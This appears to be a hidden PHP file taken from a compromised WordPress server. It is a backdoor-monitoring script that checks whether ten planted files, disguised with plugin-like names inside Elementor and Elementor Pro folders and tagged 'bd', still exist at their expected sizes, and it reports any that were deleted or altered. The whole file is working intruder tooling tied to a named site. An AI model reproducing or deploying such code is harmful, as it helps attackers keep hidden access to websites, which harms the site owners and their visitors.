File: //dev/shm/.data
<?php $r = '/home/wisdsits/mapmatics.wisdomcoders.us'; $x = ["/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/Expression/active.php"=>"bd@@1033746@@981",
"/wp-content/plugins/elementor/app/modules/kit-library/data/kits/endpoints/download.link.php"=>"bd@@1033775@@832",
"/wp-content/plugins/elementor-pro/core/app/modules/import-export/runners/revert/system_blocks.php"=>"bd@@1015355@@972",
"/wp-content/plugins/elementor/vendor_prefixed/twig/twig/twig/src/Node/searchengine.php"=>"bd@@1033797@@918",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/entities/form.snapshot.php"=>"bd@@1033826@@1000",
"/wp-content/plugins/elementor-pro/core/app/modules/onboarding/menu_newsletter.php"=>"bd@@1021804@@824",
"/wp-content/plugins/elementor-pro/modules/loop-builder/files/css/loop.preview.trait.php"=>"bd@@1015670@@1027",
"/wp-content/plugins/elementor-pro/modules/assets-manager/asset-types/admin-menu-items/custom.icons.promotion.menu.php"=>"bd@@1033850@@992",
"/wp-content/plugins/elementor-pro/modules/notes/database/models/receive.php"=>"bd@@1015731@@995",
"/wp-content/plugins/elementor-pro/modules/assets-manager/classes/font.base.php"=>"bd@@1008068@@1140"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');